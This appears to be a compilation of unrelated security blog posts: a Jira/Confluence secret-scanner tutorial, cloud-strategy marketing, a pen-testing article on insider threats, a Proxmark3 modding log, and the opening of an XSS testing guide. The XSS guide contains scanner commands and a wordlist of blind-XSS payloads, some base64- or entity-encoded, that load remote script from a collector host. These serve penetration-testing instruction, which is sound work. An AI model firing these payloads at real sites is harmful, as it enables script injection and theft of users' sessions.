TLDR; Upgrade Confluence to a patched version and employ the open-source security scanner n0s1 to proactively address potential secret leaks.

Why do I need a secret scanner?

It is a widely recognized best practice for Product Security Engineers to conduct scans of the software codebase in search of potential inadvertent secret leaks. Developers may find themselves working on a new feature that requires integration with AWS and might, initially for convenience during testing, hardcode the AWS access key. This practice is acceptable for local testing, with the intention of removing the secret prior to pushing the final code to Source Code Management (e.g., GitHub, GitLab, etc.).

However, it is not unusual for individuals to forget to remove the sensitive data before committing changes, resulting in sensitive data being inadvertently exposed within the source code. Consequently, anyone with read access to the repository gains access to the AWS resources associated with the exposed AWS access key in our example.

That is a very common mistake, and well-established Product Security Programs often implement controls, such as pre-commit hooks, or secret scanning tools like GitHub Secret Scanning or GitLab Secret Detection, to mitigate the risk of secret leaks.

In this article, I aim to address a frequently overlooked but similar use case: the inadvertent exposure of secrets within Project Management platforms like Jira, Confluence, and Linear.app.

Confluence page exposing AWS access key

Development teams commonly employ tools like Jira and Linear.app for ticketing and rely on knowledge base platforms such as Confluence to facilitate their software development life cycle (SDLC) processes. Even before a developer writes their initial code, including for instance, an API call to AWS, it’s quite likely that there is already a Jira ticket assigned to that developer, specifying which AWS account to utilize. On top of that, there might be a software documentation page on Confluence outlining the software’s cloud integration. Unfortunately, at times, individuals may inadvertently post sensitive data (such as AWS credentials) on a platform that isn’t suitable for securely storing secrets, like Jira or Confluence.

Why should I scan Jira/Confluence for secrets?

Some people may contend that the consequences of a secret leak within a platform like Confluence are not as significant as a leak within the source code. After all, source code is intended for building and public distribution, while Confluence and Jira implement access controls to restrict access to authorized personnel. I firmly disagree with this perspective, and to illustrate my point, we can examine the disclosure of CVE-2023–22515.

CVE-2023–2215 Confluence unauthorized administrator access

In the event of full exploitation, the CVE-2023–22515 vulnerability could potentially grant external attackers unauthorized administrative access to Confluence Data Center or Confluence Server. Both the vendor (Atlassian)and the US government have issued warnings regarding active exploitation of this vulnerability by nation-state actors. Companies that previously relied on the assumption that Confluence data would only be accessible to authorized users are now confronted with a situation in which they must not only be concerned about attackers attempting to use Confluence as a pivot to access their internal infrastructure but also gaining access to all of their confidential content within Confluence. If attackers can locate secrets within Confluence, as exemplified by our AWS key scenario, we just made their pivoting goal incredibly easy to accomplish.

That’s why it’s considered a sound security practice to exclusively permit the sharing of secrets through approved secret management software (e.g., Vault, 1Password, etc.), and additionally, to employ a secret scanner to proactively monitor the exposure of secrets on unapproved platforms.

What is a secret scanner?

Secret scanning involves inspecting code repositories and other data sources to uncover sensitive information, including passwords, access keys, and personally identifiable information (PII). This procedure can be carried out using a range of tools and methods, such as the use of regular expressions to identify patterns associated with specific types of sensitive data.

What is n0s1 secret scanner?

n0s1 is an open-source secret scanner designed by Spark 1 Security for use with Jira, Confluence, and Linear.app. It can be executed as a command-line interface (CLI), within a Docker container, as part of GitHub Actions, or integrated into GitLab CI. n0s1 employs predefined and customizable regular expressions to identify a wide range of secret classes that you wish to monitor. Its versatility enables it to address various use cases, which we will explore in the following sections.

n0s1 install

Simply install it via pip and use “-h” to get help. More details at n0s1 documentation page:

python -m ensurepip --upgrade
python -m pip install n0s1
n0s1 confluence_scan -h

Scan Jira from CLI:

Simply install it via pip and scan your Jira server:

n0s1 jira_scan --server "https://<YOUR_JIRA_SERVER>.atlassian.net" --api-key "<YOUR_JIRA_API_TOKEN>"

Scan Jira and Confluence from GitLab CI:

The advantage of integrating with GitHub and GitLab is the ability to centralize all the findings within a unified platform. If you are already scanning for secrets in your codebase and keeping track of these findings in the GitHub Security tab or the GitLab Vulnerability Report, it makes sense to also have the results from the secret scanner sent to the same location. This streamlines the management of security information and enhances overall visibility.

n0s1 findings as part of GitLab Vulnerability report

To create a GitLab Vulnerability report akin to the one displayed in the screenshot, you can achieve this by incorporating the following configuration into your .gitlab-ci.yml file.

jira-scan:
stage: test
image:
name: spark1security/n0s1
entrypoint: [""]
script:
- n0s1 jira_scan --email "<EMAIL>" --api-key $JIRA_TOKEN --server "https://<YOUR_DOMAIN>.atlassian.net" --report-file gl-dast-report.json --report-format gitlab
- apt-get update
- apt-get -y install jq
- cat gl-dast-report.json | jq
artifacts:
reports:
dast:
- gl-dast-report.json

confluence-scan:
stage: test
image:
name: spark1security/n0s1
entrypoint: [""]
script:
- n0s1 confluence_scan --email "<EMAIL>" --api-key $JIRA_TOKEN --server "https://<YOUR_DOMAIN>.atlassian.net" --report-file gl-dast-report.json --report-format gitlab
- apt-get update
- apt-get -y install jq
- cat gl-dast-report.json | jq
artifacts:
reports:
dast:
- gl-dast-report.json

*Note: you will also need to add protected JIRA_TOKEN CI/CD variable to your GitLab repository CI/CD settings.

Scan Jira using GitHub Actions:

Additionally, you have the option to use GitHub Actions for running a secret scan and exporting the results into a SARIF report. If you’re utilizing GitHub Enterprise, your report will also be accessible through the Security scanningtab, providing a comprehensive view of your security assessment.

name: jira_secret_scanning
on:
schedule:
- cron: "0 10 * * *"
workflow_dispatch:

jobs:
jira_secret_scanning:
name: Jira Scanning for Secret Leaks
runs-on: ubuntu-20.04
steps:
- name: Run n0s1 secret scanner on Jira
uses: spark1security/n0s1-action@main
env:
JIRA_TOKEN: ${{ secrets.JIRA_API_TOKEN }}
with:
scan-target: 'jira_scan'
user-email: 'service_account@<YOUR_COMPANY>.atlassian.net'
platform-url: 'https://<YOUR_COMPANY>.atlassian.net'
report-file: 'jira_leaked_secrets.sarif'
report-format: 'sarif'
- name: Upload n0s1 secret scan results to GitHub Security Codescanning
uses: github/codeql-action/upload-sarif@v2
with:
sarif_file: jira_leaked_secrets.sarif
- name: Upload n0s1 secret scan report
uses: actions/upload-artifact@v3
with:
name: n0s1-artifact
path: jira_leaked_secrets.sarif
retention-days: 5

Scan Confluence using customized regular expressions:

You can further customize the regex configuration to target specific sensitive data that aligns with your requirements. For instance, if you wish to identify any occurrences of the string “password = “ or “password:”, you can achieve this by creating a local copy of the regex.toml file and appending the following regular expression to it:

[[rules]]
id = "plaintext_password"
description = "Plaintext Password"
regex = '''(?i)password ?[=:] ?.*'''
keywords = ["password"]

You can save your new regex configuration to a local file (e.g. /home/user/my_regex.toml) and use it with the argument “--regex-file”:

n0s1 confluence_scan --regex-file /home/user/my_regex.toml --email <YOUR_EMAIL> --api-key <YOUR_CONFLUENCE_API_TOKEN> --server https://<YOUR_CONFLUENCE>.atlassian.net

If you are using docker, you will need to mount a volume to pass the local file to the container:

docker run -v /home/user/my_regex.toml:/my_regex.toml spark1security/n0s1 confluence_scan --email <YOUR_EMAIL> --api-key <YOUR_CONFLUENCE_API_TOKEN> --server https://<YOUR_CONFLUENCE>.atlassian.net--regex-file /my_regex.toml

Scan Confluence and automatically warn users about secret leaks:

A particularly valuable feature, especially for organizations with extensive Jira/Confluence usage, is the ability to leave a comment on the specific ticket or page where the leak has been discovered. The posted message serves as a warning to the user regarding the potential secret exposure and offers guidance on how to remediate it effectively.

n0s1 confluence_scan --post-comment --server "https://<YOUR_SERVER>.atlassian.net" --api-key "<YOUR_API_TOKEN>"

This approach resonates with the concept that security is a collective responsibility within an organization, while also simplifying the scalability of secret monitoring. Although the security team will maintain a centralized report with all the findings, it also empowers the ticket owner to become informed about the issue and take steps to address the secret exposure on their own.

n0s1 scanner auto message posted to the page where a leak was found

There are various other applications for n0s1. In this article, my primary emphasis was on the blue team’s perspective regarding the secret scanner. Nevertheless, pentesters can also make effective use of it to illustrate scenarios, such as demonstrating the potential impact of CVE-2023–22515 exploitation, even when administrative access is not attainable. The capacity to discover valuable sensitive information might be all that the red team requires to execute privilege escalation and/or pivot within the system.

As n0s1 is an open-source project, you’re welcome to either fork the project or contribute to the original repository. A collaborative endeavor involving the open-source community could significantly enhance the scanner’s capabilities, extending its support to cover additional platforms beyond the current ones (Jira, Confluence, Linear.app). This collective effort can also result in the development of a comprehensive set of regular expressions that effectively identify a broad range of secrets that require protection worldwide.

Did you find this article intriguing? Please feel free to share your comments and feedback regarding the post. If you want to learn more about n0s1 security scanner or any other insightful content by Spark 1 Security, please visit spark1.us

Originally published at: https://medium.com/@marcelosacchetin/secret-scanner-for-jira-and-confluence-cve-2023-22515-defense-in-depth-ce30f10a7661

Nowadays, with the evolution of technology, many companies are starting their journey as a cloud native company. They don’t work in traditional infrastructure environments. Cloud computing has become more accessible, for any people inside of company, since the cloud architecture until marketing team, remote workers, after the covid-19 pandemic, many organizations have been increasing their access in the cloud.

This migration, or “adaptation”, brings a series of challenges, according to the Gartner Peers Community, these are the responses to a question about cloud adoption:

 

“What, according to you, is the most common challenge faced with cloud adoption?”

source:https://www.gartner.com/peer-community/poll/according-to-most-common-challenge-faced-cloud-adoption

As we can see, almost 30% didn’t have enough personnel with “Cloud Expertise”, almost 30% had a sheer sprawl of data in the existing environment, 18% had no visibility into the content and 13% are challenged by migrating data to the cloud, that is, almost 80% of the challenges involved management of dates and not enough people with expertise in the cloud. All of this information brings us to another important challenge.

A cloud strategy is a concise viewpoint on the role of cloud computing in the organization. However, business and IT leaders continue to make 10 common mistakes when crafting their cloud strategy, according to Gartner, Inc.

Gartner analysts are discussing how to enable and exploit cloud, and demonstrate value at the Gartner IT Infrastructure, Operations & Cloud Strategies Conference 2022. Business and IT leaders should collaboratively build a cloud strategy and avoid the following 10 mistakes when building their cloud strategy. Let's talk about all of them.

 

  1. Assuming It’s an IT (Only) Strategy

Cloud computing isn’t only about technology. Those outside IT have skills and knowledge critical to cloud strategy success. “Business and IT leaders should avoid the mistake of devising an IT-centric strategy and then trying to “sell it” to the rest of the business,” said Meinardi. “Business and IT should be equal partners in the definition of the cloud strategy.”

  1. Not Having an Exit Strategy

Devising an exit strategy from cloud providers is difficult, which is one of the reasons why many leaders don’t create one. Many organizations believe they don’t need an exit strategy because they don’t expect to bring anything back from the cloud. However, an exit strategy is vital to the success of an organization’s cloud strategy. “It’s like having an insurance policy in your drawer, that you hopefully will never need to use,” said Meinardi.

  1. Combining or Confusing a Cloud Strategy with a Cloud Implementation Plan

A cloud strategy is different from a cloud implementation plan and a cloud strategy must come first. It is the decision phase in which business and IT leaders decide the role that cloud computing will play in the organization. A cloud implementation plan comes next, putting the cloud strategy into effect.

  1. Believing It’s Too Late to Devise a Cloud Strategy

It is never too late to begin a cloud strategy. “If organizations drive cloud adoption without a strategy this will ultimately cause resistance from individuals who are not aligned on the strategy’s key drivers and principles,” said Meinardi. “As a result, this resistance will slow down cloud adoption and potentially jeopardize the entire cloud project.”

  1. Equating a Cloud Strategy with “We’re Moving Everything to the Cloud”

Many organizations assume that having a cloud strategy implies moving everything to the cloud. “This approach deters many business and IT leaders from devising a strategy because they think it means they’ll be forced to start using cloud computing for everything,” said Meinardi. “Organizations should keep an open mind and partner with a non-cloud technology expert, such as an enterprise architect, who can bring a broad viewpoint in the definition of your cloud strategy.”

  1. Saying “Our Cloud Strategy Is Our Data Center Strategy”

Many organizations confuse their cloud strategy with their data center strategy. While organizations need to keep them separate, they need to ensure they align with each other because that affects the role that cloud computing will play in their organization. “Cloud strategy decisions are workload by workload, not data center decisions,” said Meinardi.

  1. Believing That an Executive Mandate Is a Strategy

Another common mistake that organizations make is to adopt cloud computing because the CEO, CIO or the head of a business unit believes that doing so will result in cost savings. Gartner analysts recommend treating executive mandates as sponsorship to devise a cloud strategy and not as a cloud strategy in and of itself. The cloud strategy should also keep the connection to the business, ensuring that organizations know why workloads are moving and what the goal is.

  1. Believing That Being a <Fill in Vendor> Shop Means That Is the Cloud Strategy

Organizations will likely use several different cloud services over time. As the use of cloud services could become increasingly broad and diverse, business and IT leaders should devise a broad strategy by accommodating multiple types of scenarios, cloud services, vendors and non-cloud environments.

  1. Outsourcing Development of Your Cloud Strategy

Outsourcing an organization’s cloud strategy may sound attractive, but should not be done – it is far too important to outsource. Instead, Gartner analysts recommend that business and IT leaders use third parties — even the cloud provider — for implementation. This can be a cost-effective way of procuring the scarce cloud skills their organization needs.

  1. Saying “Our Strategy Is Cloud First” Is the Entire Cloud Strategy

A cloud-first approach means that if someone asks for an investment, the default place for them to build or place the new asset is in the public cloud. “But cloud-first doesn’t mean cloud only. If business and IT leaders adopt a cloud-first principle, their strategy should work out the exceptions to the default choice that will make applications and elsewhere other than in the cloud,” said Meinardi.

 

The big issue is that the larger the company, the more people will have access to cloud-based environments. Moreover, many permissions are granted to applications and machines that connect to other applications and databases to exchange information.

Thus, it is necessary to have a strategy that limits unnecessary access and prevents inadequate sharing of information, which can be achieved through CIEM.

 

What is CIEM?

The purpose of Cloud Infrastructure Entitlements Management (CIEM) is to manage access in cloud and multi-cloud environments.

This is possible through the principle of Least Privilege, which contributes to companies that need to avoid risks such as attacks by malicious users and data breaches, problems generated by excessive permissions on this type of infrastructure.

Thus, a CIEM solution allows you to remove these excessive entitlements and centralize the visibility and control of permissions in a cloud environment.

Through the use of artificial intelligence, a CIEM solution is also able to analyze exposure levels of a company’s cloud environments, enabling the identification and reduction of cybersecurity risks.

 

How can we help you?

Has your company migrated its infrastructure to the cloud? Do you work in a multi-cloud environment? Does your security team have full visibility of identities and entitlements on Cloud Service Providers (CSPs)?

Managing cloud entitlements has become a challenge for cybersecurity teams. This happens especially because of the increased number and complexity in multi cloud environments. In these environments, services and policies can be misconfigured and poorly defined.

According to Gartner, by 2024, organizations running cloud infrastructure services will suffer a minimum of 2,300 violations of least privilege policies, per account, every year.

senhasegura Cloud Entitlements help enterprises manage cloud access risks via administration-time controls for the governance of entitlements in hybrid and multi cloud IaaS.

 

Do you know what "Build With Us" is?

We are inviting you to have first-hand access to our new cloud security platform and participate in our beta users program. If you are an Information Security professional with experience in IAM and wish to participate in the construction of an innovative project, come build with us.

What do I gain as a senhasegura beta user?

  • Free access to senhasegura Cloud Security - Cloud Entitlements for one year, with no limit on the number of identities to manage.
  • Opportunity to participate in online feedback with our team of Built-With-Us supporters to share their impressions and suggestions.
  • Rich exchange of experiences with professionals in the IAM market about the challenges of managing identities in multi-cloud environments.
  • Opportunity to permanently occupy a chair in our Innovation Committee, where we discuss problems and build solutions for the most diverse challenges in the security area - limited spaces!


What will be your mission as a senhasegura beta user?

  • Co-creation: Giving feedback and proposing improvements that would make your day-to-day work easier.
  • Confidence: Report bugs and experience problems found while using the product to gain maturity and quality of the solution.
  • Practice: Carrying out specific tasks and procedures within the product to support us in building a specialist market solution.
  • Innovation: Get first-hand pre-release updates to try before the stable release goes live.

Source: demo console.

If you would like to be part of that, come to us and build with us.

 

References:



We're extremely happy to invite you to the first ever webinar by PenTest Mag! Hosted by Timothy Hoffman, the talk will evolve around the topic of our latest online course - "Aerospace Cybersecurity: Satellite Hacking", designed and instructed by Angelina Tsuboi. 

During the event, the discussion will touch the practical aspects of the fascinating field of aerospace cybersecurity. You will have a chance to listen about tools, techniques, and even real-life case studies from the realm of satellite ethical hacking. After the talk, there will be a chance to ask our instructor some questions. Also, those of participants, who have not decided to enroll yet, will get a chance to seize a special deal to secure their seats. 

 

REGISTER NOW >>

Anastasios Arampatzis

Risks assessed during a penetration test (pen-test) generally focus on attacks outside the information system. Indeed, a classic approach consists of testing the threats of external attacks, followed by assessing the risks originating from the supply chain, customers, partners, and suppliers. Risks of insider attacks, particularly from an employee’s unlawful or erroneous access to data, are often considered less important. 

Never underestimate the impact of insider risks

However, as the latest Verizon 2023 Data Breach Investigations Report indicates, almost 17% of data breaches are attributed to insiders, either negligent or intentional. The same report shows that the most significant threat does not come from "ordinary" employees but rather from privileged and technical staff like developers and system administrators. Because of the nature of systems and data these people have access to, a single mistake might have a disturbing effect on the organization. And according to the 2023 Insider Threat Report by Cybersecurity Insiders, 74% of organizations have a moderate to high risk of insider threats.

It is, therefore, crucial for any organization with a solid security plan to assess and prevent insider threats. Penetration testing can become a valuable tool for detecting and preventing the consequences of an internal attack.

A primer on insider threats

Insider threats from internal staff or people closely associated with a company pose a significant organizational risk. These individuals can include current and former employees, customers, service providers, contractors, or partners with direct or indirect access to the organization's resources. Unfortunately, they can use this access intentionally or unintentionally to compromise the IT and network infrastructure or internal applications.

It's worth noting that not all insider threats stem from malicious motives or intentional actions. Many security incidents occur due to human negligence, errors, or insufficient security measures. For instance, clicking on a phishing email, using unpatched workstations, having weak passwords, or losing business equipment are potential risk factors that can compromise an organization's resources.

Although no company is immune to potential insider threats, businesses with a high turnover rate or failing to raise awareness of cybersecurity issues among their employees are at greater risk. Therefore, it is essential to identify insider risks, implement adequate controls and simulate an internal attack through penetration testing to measure the actual impact and test the effectiveness of the protections in place.

How pen-testing can help

By providing the pen-testers with the same access as a company employee, they can simulate an insider attacker and attempt to access resources that should not be accessible to them.

Application hardening

When conducting a web application pen-test, testers will be granted typical access rights for solutions meant to be used internally. For public-facing B2B or B2C platforms, they will have access to the back office. 

If the solution is for internal use, the goal is to identify flaws that an authenticated user could exploit. This includes verifying proper segmentation of duties and access rights, testing for possible improper behavior, and technical vulnerabilities that malicious actors could exploit. 

On the other hand, for externally facing platforms, it's crucial to test the separation of duties, primarily if multiple access privileges exist. Accessing the back office helps to test for the possibility of internal actors moving laterally and accessing other corporate systems. Pen-testing can also evaluate the risks of an attacker taking control of the back office through a technical flaw or stolen credentials.

Corporate network protection

It is a common practice that a corporation's internal network pen-test includes an assessment of insider threats. Pen-testing usually tests the possibilities of accessing the Wi-Fi internal network without user credentials. In this case, Wi-Fi vulnerabilities or brute force attacks may allow an external attacker to access the corporate network.

Generally, for tests on the internal corporate networks, the pen-testers have the same level of access as employees with minimum privileges on the company’s information system. This makes it possible to test the segmentation of access rights and the possibilities of accessing critical resources or taking control of servers. In addition, pen-testing discovers vulnerabilities that could be exploited by a malicious employee or an external attacker who has gained access to the network to move laterally undetected.

Pen-testing can also help thwart the problem of privilege abuse, which is a common attack vector. Providing different access privileges – from standard employees to developers and system admins - enables pen-testers a more detailed and complete analysis of insider risks. This is even more relevant and important if the company has implemented network segmentation to protect critical systems from accessing the internet directly.

Phishing and social engineering safeguards

In a social engineering pen-test, the team is granted access to the same information as the company's employees. The company's testing objectives determine the amount of information supplied to the pen-testers. 

It is vital for businesses to be cautious not to disclose too much information, as a complete data set can distort the tests. Phishing attacks are typically based on partial or imperfect knowledge of the company, so it is advisable only to provide information that employees have access to, like company activity, internal tools, organization charts, and contact details. This approach will enable pen-testers to craft and execute realistic attack scenarios.

To identify risks from social engineering attacks, pen-tests may involve tactics such as:

  • Exploiting internal company news to trick employees into opening a malicious email attachment
  • Stealing identities by leveraging the knowledge of the relationships between different departments and personnel within the organization
  • Cloning internal tools and using them to steal credentials

Frequent pen-testing can help businesses identify potential vulnerabilities and eliminate insider security threats. After these tests have been performed, companies can mitigate any loopholes using software solutions and investing in raising security awareness among their employees.

About the Author: Anastasios Arampatzis is a retired Hellenic Air Force officer with over 20 years’ worth of experience in managing IT projects and evaluating cybersecurity. During his service in the Armed Forces, he was assigned to various key positions in national, NATO and EU headquarters and has been honoured by numerous high-ranking officers for his expertise and professionalism. He was nominated as a certified NATO evaluator for information security.

Anastasios’ interests include among others cybersecurity policy and governance, ICS and IoT security, encryption, and certificates management. He is also exploring the human side of cybersecurity - the psychology of security, public education, organizational training programs, and the effect of biases (cultural, heuristic and cognitive) in applying cybersecurity policies and integrating technology into learning. He is intrigued by new challenges, open-minded and flexible. Currently, he works as a cybersecurity content writer for Bora Design. Tassos is a member of the non-profit organization Homo Digitalis. A person wearing glasses smiling

Description automatically generated

When I first borrowed the Proxmark3.0 X from @unrooted, the tinkerer part of me decided to do something with it, as the amount of both free time and spare parts around me was tremendous. This short entry will highlight some hardware modifications applied to this marvelous device.

Initial preparations

The product of finest craftsmanship by MToolsTec originates from a small batch of devices with 512 mb flash + reliable SPIFFS filesystem, which can easily fit even the most extensive dictionaries of keys, LF tag IDs and UIDs.
First, I decided to place a cooler and a HST socket for an external Li-Po on the top of the main board.
Exporting the JTAG right now is a necessity too, because later it's soldering pads will be covered by other components.
This model of Proxmark3 consists of six elements:

    I)   The main board
    II)  BT add-on
    III) LF antenna
    IV)  Li-Po cell
    V)   Flat inter-connector tape
    VI) screws and poles

Frankly, I didn't want to dismantle the poles and screws whenever adding new stuff, that's why I rotated (I) and (II) so that all vital internals of (I) face the outside of the device, while also making quite some free space in-between. I have also bent (V) to the outside and secured it with duct tape, allowing for those new arrangements.
I noticed that during flashing via JTAG, the area around the FPGA was often hot. To overcome this, the cooler was mounted above it.

LF Antenna

This was probably the most practical addition so far - without the antenna on top, the device became a bit thinner, and carrying a screwdriver to attach/detach it was no longer a necessity. I used 1.2 mm single-core wire to ensure stable data transmission. Two crocodile clip cables allow connecting the antenna to the middle-pair of the poles without any hassle.

The front

In order to access the D+ and D- pads of the connected micro-USB cable, I have changed the position of the Li-Po cell on the BT add-on.
Fortunately, the manufacturer made sure that the cell's wires are long enough to allow this. Same as with the main Proxmark board, the JTAG and serial lines were mounted on the top with female sockets. A small feather, glued below the Li-Po, actively protects the device from influence of various unholy forces.

The rear

On the bottom-facing part of the device, the cooler is operated by Wemos D1 Mini Pro, powered by a rechargable 3.7V Li-Po (single cell) and a micro-USB charger. A temp + humidity sensors launch the cooling routine once a specific treshold is met. By simply removing the pink control jumper, the cooler can enter a state in which it permanently cools the FPGA side,  Whenever the device is moved, a tilt sensor communicates this fact to the Wemos, which in turn sends the motion force value using a plain HTTP webhook.
th sensors, as well as the secondary HST socket and some of the cables, are enclosed by the SRBOT 2.4 GHz wifi jammer - it tightens all of the elements together.

The mighty Peltier

Initially, the cooler was powered by an external power source, only later I have attached it to Wemos for more granular control. The power (~3.7V) to this specific cell is delivered in bursts, with polarity change happening between each of them (mass becomes Vcc for a while, and other way round). This way, both FPGA-facing and board-facing surfaces of the cooler act interchangeably - one cools while other heats, and vice versa. This way, none of them remains hot for too long, and heat is well distributed. 
It is important to keep the cooler away from the power sources, and introduce some space above one of the planes to
prevent overheating. As suggested by mighty redditors, a radiator is a necessity here for optimal operation. I plan on adding it and a T555 timer unit to allow manual setting of how many seconds pass between each polarity change.

Update: a few days later

I somehow managed to burn the Wemos while fixing the SMA socket - after removing almost everything from the rear of the device, I replaced the Li-Po charger with a more potent one (USB Type C with two indicator LEDs) and changed the position of the temperature sensor. The Vcc and GND of the charger, tightened with a slim piece of duct tape, serve as an auxiliary power source whenever USB-C is connected, and fits nicely into the Peltier's socket. Two OUT[+|-] cables (red and yellow) attached freely to the top of the cooler currently await for the arrival of the FPGA 2040 and some extra parts to replace the broken Wemos. Stay tuned.
Epilogue

This was certainly a fun project that gave me some insight into the inner workings of Proxmark3 and helped me further develop my crafts. Thanks for reading, and see you.
 

INTRODUCTION

The article describes how to test the application to find Cross-Site Scripting vulnerabilities. The advice in this article is based on the following:

  • OWASP Web Security Testing Guide
  • OWASP Application Security Verification Standard
  • Bug bounty reports
  • Own experience.
  • OWASP Application Security Verification Standard
  • Bug bounty reports
  • Own experience.

TOOLING

Tools with basic usage instructions & wordlist used for the XSS detection.

STANDALONE TOOLS

  • XSStrike — semi-automated, capable of testing blind XSS, injecting in the URL path, finding outdated JS components, and bypassing WAF.

The options--path , --blind, and --fuzzer will not work all at once.
The --path option will not work if the http://URL/contains/any?queries=1 .

# SINGLE URL + ADDITIONAL HEADERS (Authoriztion)
python xsstrike.py -u "http://afine.com/s.php?q=test" --headers "Auth_header: secret1\nCookie: auth2=secret2"
## YOU CAN ALSO EDIT XSStrike CONFIG FILE => XSStrike/core/config.py
headers = {
'Auth_header' : 'secret1',
'Cookie' : 'auth2=secret2',
}

# POST REQUEST
python xsstrike.py -u "http://afine.com/s.php" --data "q=test"

# POST + JSON
python xsstrike.py -u "http://afine.com/s.php" --data '{"q":"query"}' --json

# MULTIPLE URLS & VULNS LOG TO FILE xss.log
for url in $(cat urls_path_only.txt); do python xsstrike.py -u "$url" --log-file xss.log --file-log-level VULN | tee -a xsstrike_all.log; done

# INJECT IN PATH
python xsstrike.py --path "http://afine.com/one/two/three/"

# FIND WAF BYPASS (Fuzzing)
python xsstrike.py -d 1 --fuzzer -u "http://afine.com/s.php?q=test"

# BLIND PAYLOAD
## EDIT XSStrike CONFIG FILE => XSStrike/core/config.py
blindPayload = '"><script src=https://collab></script>'
## USE FLAG
python xsstrike.py -u "http://afine.com/s.php?q=test" --blind

# PROXY TO BURP
## EDIT XSStrike CONFIG FILE => XSStrike/core/config.py
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# USE FLAG
python xsstrike.py -u "http://afine.com/s.php?q=test" --proxy

For more information check XSStrike wiki.

  • DalFox — semi-automated, capable of testing stored/blind XSS and finding bypasses for misconfigured CSP.
# SINGLE URL + AUTHORIZATION
dalfox url https://afine.com/ -H "Cookie: auth1=secret1" -H "Auth2: secret2"

# MULTIPLE URLS & LOG TO FILE dalfox.txt
cat urls.txt | dalfox pipe --mass --silence --no-color -o dalfox.txt

# BLIND
dalfox url https://afine.com/ -b https://collab

# PROXY TO BURP
dalfox url https://afine.com/ --proxy http://127.0.0.1:8080

# SCAN USING BURP REQUEST IN A TXT FILE
dalfox file --rawdata request.txt

# STORED XSS MODE + POST DATA & GET TRIGGER
## dalfox sxss TARGET_URL -d POST=DATA --trigger VERIFY_URL --skip-mining-all --skip-bav
dalfox sxss "https://afine.com/name" -X POST -d "user=karmaz&pass=123" -p user,pass --trigger "https://afine.com/my_profile"

# TOROUGH TESTING WITH HEADLESS MODE (SLOW)
dalfox file urls.txt --deep-domxss --follow-redirects -b https://collab

For more information check DalFox wiki.

I have described how to use above automatic scanners in another article.

 

BURP SUITE PRO EXTENSIONS

  • Paramalyzer — shows which parameters are reflected in the response, analyzing only in-scope targets.
Source: Own study — Example output from the Paramalyzer analysis.
  • DOM Invader — manual testing of DOM and PostMessage XSS, possible upgrade to semi-automated using the Auto fire eventsoption.
Source: Own study — DOM Invader configuration for semi-automated testing of DOM XSS & PostMessage.

The Prototype pollution will be described in another article in this series.

# QUICK SETUP ON MacOS
cd $HOME/tools/
git clone https://github.com/PortSwigger/xss-validator.git
brew install phantomjs
phantomjs $HOME/tools/xss-validator/xss-detector/xss.js &
Source: Own study — Basic setup for xssValidator + Intruder in Burp Suite Pro.
  • Burp Bounty Pro — additional automatic scanning capabilities for Burp.
Source: Own study — Using Burp Bounty Pro on 4 URLs with an XSS scan.

WORDLISTS

<script src=https://crimson.xss.ht></script>
'><script src=https://crimson.xss.ht></script>
"><script src=https://crimson.xss.ht></script>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://crimson.xss.ht\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY3JpbXNvbi54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY3JpbXNvbi54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY3JpbXNvbi54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//crimson.xss.ht");a.send();</script>
<script>$.getScript("//crimson.xss.ht")</script>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;crimson.xss.ht&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">

Line 5,6,7 —contains base64 encoded payload in id value.
The decoded payload is shown below:

var a=document.createElement("script");a.src="https://crimson.xss.ht";document.body.appendChild(a);
  • single-char — wordlist for checking how the application handles some special characters, 1500 payloads (contains the below list).
  • special_chars.txt — minimalistic wordlist with special characters.

PRIVATE XSSHUNTER

The Burp Collaborator, in most cases, is enough to check for the Blind XSS vulnerability that is triggered instantly, but sometimes the payload is triggered even after a few hours. For this scenario, having a self-hosted XSS Hunter Express container on a VPS is good for tracking them.

GUIDELINES

In the below guidelines, I assume that you identified the application entry points described in my previous article.

It would be best to use Paramalyzer to gather all reflected values.

Just to remind you XSS can be injected into HTML input fields, but may also exists in HTTP headers like the Cookie or User-Agent, if their values are displayed on the page or processed by some engines that you cannot see.

I. STARTING FROM THE BOTTOM — HTML INJECTION

Use simple HTML injection payloads first like <h1>,<s>,<b> ,<img=x> .

Source: Own study — The example HTML injection

Sometimes it will not be possible to escalate the HTML injection to the XSS vulnerability. It is commonly happening during testing the application functionalities, that are sending mails with partial user content that is vulnerable to HTML injection, for instance username value.

II. TESTING POLYGLOTS

Inject XSS polyglot payloads that fit in many contexts.

